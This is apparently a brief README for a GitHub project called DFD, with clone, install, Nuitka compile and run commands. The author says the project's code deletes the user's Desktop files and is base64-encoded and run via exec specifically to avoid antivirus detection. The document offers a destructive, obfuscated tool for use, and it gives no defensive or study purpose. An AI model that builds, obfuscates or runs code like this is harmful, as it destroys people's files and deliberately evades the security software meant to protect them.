Github:
git clone https://github.com/I2rys/DFD
Python Packages:
pip install -r requirements.txt
nuitka --mingw64 index.py
python index.py
I encoded the Desktop files deleting code to base64 to avoid any antivirus detection, so If you want to see the code in plain text just decode the encoded base64 or change the exec to print then run index.py.
MIT © I2rys